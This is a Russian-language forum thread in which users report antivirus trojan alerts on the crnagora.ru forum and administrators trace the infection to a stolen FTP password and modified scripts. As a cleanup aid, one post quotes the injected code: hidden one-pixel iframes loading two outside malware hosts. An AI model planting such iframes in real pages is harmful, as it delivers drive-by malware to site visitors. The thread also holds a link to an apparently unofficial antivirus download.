Будьте внимательны.
Вчера при заходе на форум ко мне в комп пытался прорваться троян!

Вот сообщение Касперского:

The requested URL [url=http://www.crnagora.ru/forum[/url] is infected with Trojan-Clicker.HTML.IFrame.ab virus

подтверждаю!!!

Точно, на меня пытался напасть!

Local Settings\Temporary Internet Files\Content.IE5\IM3SWQR2\in[1].htm\JavaScript.0 - инфицирован Trojan.DownLoader.50222

Это Веб сказал....-с последнего сохраненного поста!....делать то что?

Запустить полную проверку компа антивирусом и уничтожить если что-то обнаружится.

Спасибо за предупреждение.

Рекомендую всем соблюдать максимальные меры предосторожности при работе на форму. К сожалению, по техническим причинам мы не сможем решить проблему быстро.

В случае обнаружения следов вируса необходимо выполнить
следующие действия с обязательным соблюдением порядка:

1. Удалить вирусное содержимое со страниц вашего сайта.
2. Обновить свою антивирусную программу и проверить локальный компьютер на наличие вирусов.
3. Зайти в панель управления хостинг-аккаунтом
и изменить пароль на пользователя FTP.

Я так думаю у кого-то из админов, вирус сидел на компе, вот и ушел пароль от FTP.
Удачи в лечении.


на страницах нужно искать примерно такое
----
<body bgColor=#CCCCCC leftMargin=0 topMargin=0 marginheight="0" marginwidth="0"><iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe>
----
или
----
<iframe src=http://dorzentovan.com/sp/ frameborder=0 width=1 height=1 scrolling=no></iframe><iframe src=http://dkfjkdkjsl.com/spk2/ frameborder=0 width=1 height=1 scrolling=no></iframe>
----

Еще раз удачи

Ага. Два дня назад snoop передал бразды правления, если не ошибаюсь, А+А.
Возможно, конечно, совпадение, но...
Сегодня еле запустил комп, и вижу, что из компа все выгружает троян

У модераторов нет доступа к прову по FTP.

Да покажите же мне этот вирус наконец. Хобби у меня просто, вирусное (разбираться что и как). Весь форум облазил, ничто прицепиться не пытается. У меня антивирус AVIRA, если что. Просканил и DrWebом. Причем загружался с LiveCD.

Да чего его показывать? Вчера вечером опять этот вирус грузился. Да проблем нет, Касперский его убивает у меня и дальше все работает. Не проблема. Зачем антивирус то обновлять если он и так новый и сам обновляется? Что то вы все усложняете. Поставьте антивирус нормальный и непиратский с неворованными ключами и все наладится.

выйдите с форума и войдите. при нажатии ВОЙТИ он и прицепляется.
пару дней назад Касперский его ловил, Dr.Web молчал. а сегодня и Dr.Web нашел этого Trojan.DownLoader.50222

Да хобби у меня внутри вирусов копаться самому, а не антивирусом.

А про обновление не понял, я вроде про такое ничего не писал. У меня всегда сами антивирусы обновляются (AVIRA Antivir и Dr. Web). И с родными лицензионными ключиками. Неужто думаете, Граф не может позволить себе купить? У меня и Windows и Office легальные.



Не получилось, Александар. Несколько раз пробовал и процессы мониторил. Ну да пес с ним.

Так отключите антивирус, файрволл, заходите на форум и копайтесь на здоровье.

Троян=пропал!? Нет предупреждающей надписи... ура!? Однако у меня сохранилась странная "функция"=изменять любой свой старый пост!!! Хоть за прошлый год! Хоть вообще стирать! (и все эти изменения-сохраняются в форуме!) (раньше-после сл. поста-функ. "изменить" автоматически закрывалась, а сейчас=все открыто) У вас так же?

Пенсионер спасибо за информацию.Удалил один из моих постов.

Это все хорошо=все мы задним умом с удовольствием что-то исправили бы... но , это разрушит связь! Ответы (пусть даже ругательные)-потеряют смысл.... Админ, прикрой форум и разберись!!!! Или в Спорт-лото жалобу на вас писать!?

http://rapidshare.com/files/100696191/ESET..._Edition_2B.rar
Не пропускает. Можно ставить - да простят меня приверженцы только лицензионок. Без закидонов, ставлю, по-возможности, лицензионные версии (в России), меньше проблем, но здесь - труднее. Кстати, при возвращении моих флешок от местных знакомых после "их офисов" - троян, как минимум, "има". Знаю, что есть проблема в "распознавалке" сербско-хорватского" с факса и пр., помогу в FR 9.0 Prof и др. Просто вышлю-выложу для ЧГ коммьюнити...

Увы нам! Никуда троян не пропал. Визжит дурным голосом, когда Касперский его выкусывает

У меня не визжит, но "выкусывает". Замечу, только в Экслорере, в Опере ничего не определяется.

Проблемы с трояном действительно были. Исправили

Интересна прична. Кто-то из администраторов "потерял" логин/пароль и таким образом злоумышленники получили доступ к форуму, без его взлома. Скрипты форума были модифицированы, был добавлен код, чтобы тот кто запрашивает форум ходил еще на другой сайт за трояном.
В настоящий момент пароли ФТП нами изменены. Администраторам и модераторам срочно необходимо самим изменить свои личные пароли.

Внимание модераторам!
Администрация планирует структурную модернизацию форума. Пожалуйста свяжитесь с Дмитрием (Dimus) dm(at)coline.ru для обсуждения новой структуры разделов и правил форума.